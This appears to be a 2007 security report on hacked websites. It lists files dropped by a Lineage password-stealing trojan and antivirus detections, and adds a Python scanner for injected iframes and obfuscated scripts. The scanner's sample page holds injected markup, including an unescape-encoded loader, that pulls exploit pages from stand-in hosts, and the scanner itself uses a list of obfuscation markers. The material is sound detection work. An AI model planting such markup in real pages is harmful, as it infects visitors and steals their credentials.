C:\Documents and Settings\Administrator\Local Settings\Temporary Internet Files\Content.IE5\Q08VKCK4\h[1].htm
C:\Documents and Settings\Administrator\Local Settings\Temporary Internet Files\Content.IE5\SEUIMLSE\614003[1].htm
C:\Documents and Settings\Administrator\Local Settings\Temporary Internet Files\Content.IE5\SEUIMLSE\614woai[1].exe
C:\Documents and Settings\Administrator\Local Settings\Temporary Internet Files\Content.IE5\SEUIMLSE\717003[1].htm
C:\microsofts.vbs
C:\NTDETECT.EXE
C:\WINDOWS\Web\printers\images\ndmai.dll
C:\WINDOWS\Web\printers\images\ndmai.exe

[Added COM/BHO]
{7152C68A-D93C-49BF-AFEF-6B4576849A7E}-C:\WINDOWS\Web\printers\images\ndmai.dll

As of now (2007/12/12 @ 12:38), the following antivirus products detect these malicious files (for reference only):

717[1].c:
[ Trend ], “EXPL_ANICMOO.GEN”
ndmai.dll:
[ Trend ], “Possible_Infostl”
614woai[1].exe:
[ IntelliTrap ], “PAK_Generic.001”
[ Alpha_Gen ], “Possible_Mlwr-13”
[ Symantec ], “Infostealer.Lineage”
[ Kaspersky ], “PAK:PE_Patch.PECompact, PAK:PecBundle, PAK:PECompact, PAK:PE_Patch.MaskPE”
[ Sophos ], “[FILE:0000]:Mal/LineDLL-B, Mal/EncPk-AP”
[ Nod32 ], “a variant of Win32/PSW.Lineage.ACN trojan”
[ HBEDV ], “TR/PSW.Lineage.UZH”
[ Norman ], “Trojan W32/Lineage.AYTD”
[ Grisoft ], “Trojan horse PSW.Lineage.AFS”
[ eAladdin ], “Suspicious File [100]”
[ Sunbelt ], “VIPRE.Suspicious”
[ WebWasher ], “Trojan.PSW.Lineage.UZH”
614003[1].htm:
[ McAfee ], “Exploit-ObscuredHtml”
[ McAfee_Beta ], “Exploit-ObscuredHtml”
[ HBEDV ], “HEUR/Exploit.HTML”
[ Grisoft ], “Virus found JS/Downloader.Agent”
h[1].htm:
[ McAfee ], “ObfuscatedHtml”
[ McAfee_Beta ], “ObfuscatedHtml”
[ WebWasher ], “BlockReason.46 (suspicious)”
microsofts.vbs:
[ Microsoft ], “[->(UTF-16LE)]:Virus:VBS/VBSWGbased.gen”
ndmai.exe:
[ IntelliTrap ], “PAK_Generic.001”
[ Alpha_Gen ], “Possible_Mlwr-13”
[ Symantec ], “Infostealer.Lineage”
[ Kaspersky ], “PAK:PE_Patch.PECompact, PAK:PecBundle, PAK:PECompact, PAK:PE_Patch.MaskPE”
[ Sophos ], “[FILE:0000]:Mal/LineDLL-B, Mal/EncPk-AP”
[ Nod32 ], “a variant of Win32/PSW.Lineage.ACN trojan”
[ HBEDV ], “TR/PSW.Lineage.UZH”
[ Norman ], “Trojan W32/Lineage.AYTD”
[ Grisoft ], “Trojan horse PSW.Lineage.AFS”
[ eAladdin ], “Suspicious File [100]”
[ Sunbelt ], “VIPRE.Suspicious”
[ WebWasher ], “Trojan.PSW.Lineage.UZH”
NTDETECT.EXE:
[ Microsoft ], “[->(UTF-16LE)]:Virus:VBS/VBSWGbased.gen”
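All four site compromises on this page (D-Link, 北軟, 高雄市觀光協會, 台安醫院) follow the same pattern: a line of markup planted in the home page that pulls an exploit page from another host, and the detections of h[1].htm (Mal/Iframe-A) and m[1].htm / 614003[1].htm (Exploit-ObscuredHtml, HEUR/Exploit.HTML) show what that markup looks like to a scanner. The following is an added example, not code from the original posts: a scanner that flags zero-size or CSS-hidden iframes, scripts loaded from another host or a bare IP address, and inline scripts that decode themselves with unescape()/eval(). The posts do not reproduce the injected markup, so SAMPLE_HTML is constructed here; the site host www.example.com and the off-site hosts 198.51.100.7 and bad.example are assumptions.

```python
"""Find injected iframes/scripts of the kind used to plant a malicious link
in a site's home page.

Added example, not code from the original posts. SAMPLE_HTML is constructed
to show the usual injection shapes; the host names are assumptions.
"""
from html.parser import HTMLParser
from urllib.parse import urlparse

SAMPLE_HTML = """<html><body>
<h1>Welcome</h1>
<script src="/js/menu.js"></script>
<iframe src="http://www.example.com/ad.htm" width="300" height="250"></iframe>
<iframe src="http://198.51.100.7/cip.htm" width="0" height="0" frameborder="0"></iframe>
<iframe src="http://bad.example/rl.htm" style="display:none"></iframe>
<script src="http://bad.example/1299644.js"></script>
<script>document.write(unescape("%3Ciframe%20src%3D%22http%3A//bad.example/r.htm%22%3E"));</script>
</body></html>
"""

# Markers typical of self-decoding exploit loaders (obfuscated HTML/JS).
OBFUSCATION_MARKERS = ("unescape(", "eval(", "String.fromCharCode")


def _is_tiny(value):
    """True for width/height values of 0 or 1 (pixels or percent)."""
    if value is None:
        return False
    digits = value.strip().lower().removesuffix("px").removesuffix("%")
    try:
        return float(digits) <= 1
    except ValueError:
        return False


class InjectionScanner(HTMLParser):
    """Collect (tag, src, reasons) for iframe/script elements that look injected."""

    def __init__(self, site_host):
        super().__init__()
        self.site_host = site_host.lower()
        self.findings = []
        self._in_script = False

    def handle_starttag(self, tag, attrs):
        self._in_script = tag == "script"
        if tag not in ("iframe", "script"):
            return
        a = {k.lower(): (v or "") for k, v in attrs}
        src = a.get("src", "")
        host = (urlparse(src).hostname or "").lower()
        reasons = []
        if host and host != self.site_host:
            reasons.append(f"loads from other host {host}")
            if host.replace(".", "").isdigit():
                reasons.append("host is a bare IP address")
        if tag == "iframe":
            if _is_tiny(a.get("width")) or _is_tiny(a.get("height")):
                reasons.append("zero-size iframe")
            style = a.get("style", "").replace(" ", "").lower()
            if "display:none" in style or "visibility:hidden" in style:
                reasons.append("iframe hidden by style")
            if not any(r.startswith(("zero", "iframe hidden")) for r in reasons):
                return   # a visible frame is ordinary markup, even if off-site
        if reasons:
            self.findings.append((tag, src, reasons))

    def handle_endtag(self, tag):
        if tag == "script":
            self._in_script = False

    def handle_data(self, data):
        # HTMLParser hands the whole <script> body to handle_data in CDATA mode.
        if self._in_script:
            hits = [m for m in OBFUSCATION_MARKERS if m in data]
            if hits:
                self.findings.append(("script", "<inline>", ["self-decoding script: " + ", ".join(hits)]))


def scan_html(html, site_host):
    """Run the scanner over one page and return its findings list."""
    scanner = InjectionScanner(site_host)
    scanner.feed(html)
    scanner.close()
    return scanner.findings


if __name__ == "__main__":
    for tag, src, reasons in scan_html(SAMPLE_HTML, "www.example.com"):
        print(f"{tag:6} {src:40} {'; '.join(reasons)}")
```

Run this over the saved home page and every page it links (the posts above note that other pages carried the same code), and diff the result against a known-clean copy; a visible same-host iframe, like the ad frame in the sample, is deliberately not reported, so the output stays short enough to act on.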